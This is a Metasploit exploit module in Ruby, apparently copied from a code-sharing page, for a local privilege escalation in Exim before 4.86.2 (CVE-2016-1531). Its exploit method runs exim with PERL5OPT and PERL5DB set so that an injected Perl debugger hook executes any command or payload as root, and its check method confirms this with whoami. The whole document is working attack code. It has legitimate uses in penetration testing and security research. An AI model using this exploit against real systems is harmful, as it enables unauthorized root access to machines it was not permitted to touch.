Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Local
7
  Rank = ExcellentRanking
8

9
  def initialize(info = {})
10
    super(
11
      update_info(
12
        info,
13
        'Name' => 'Exim "perl_startup" Privilege Escalation',
14
        'Description' => %q{
15
          This module exploits a Perl injection vulnerability in Exim < 4.86.2
16
          given the presence of the "perl_startup" configuration parameter.
17
        },
18
        'Author' => [
19
          'Dawid Golunski', # Vulnerability discovery
20
          'wvu' # Metasploit module
21
        ],
22
        'References' => [
23
          %w[CVE 2016-1531],
24
          %w[EDB 39549],
25
          %w[URL http://www.exim.org/static/doc/CVE-2016-1531.txt]
26
        ],
27
        'DisclosureDate' => '2016-03-10',
28
        'License' => MSF_LICENSE,
29
        'Platform' => 'unix',
30
        'Arch' => ARCH_CMD,
31
        'SessionTypes' => %w[shell meterpreter],
32
        'Privileged' => true,
33
        'Payload' => {
34
          'BadChars' => "\x22\x27" # " and '
35
        },
36
        'Targets' => [
37
          ['Exim < 4.86.2', {}]
38
        ],
39
        'DefaultTarget' => 0,
40
        'Notes' => {
41
          'Reliability' => [REPEATABLE_SESSION],
42
          'Stability' => [CRASH_SAFE],
43
          'SideEffects' => []
44
        }
45
      )
46
    )
47
  end
48

49
  def check
50
    if exploit('whoami') == 'root'
51
      CheckCode::Vulnerable
52
    else
53
      CheckCode::Safe
54
    end
55
  end
56

57
  def exploit(cmd = payload.encoded)
58
    # PERL5DB technique from http://perldoc.perl.org/perlrun.html
59
    cmd_exec(%(PERL5OPT=-d PERL5DB='exec "#{cmd}"' exim -ps 2>&-))
60
  end
61
end
62

63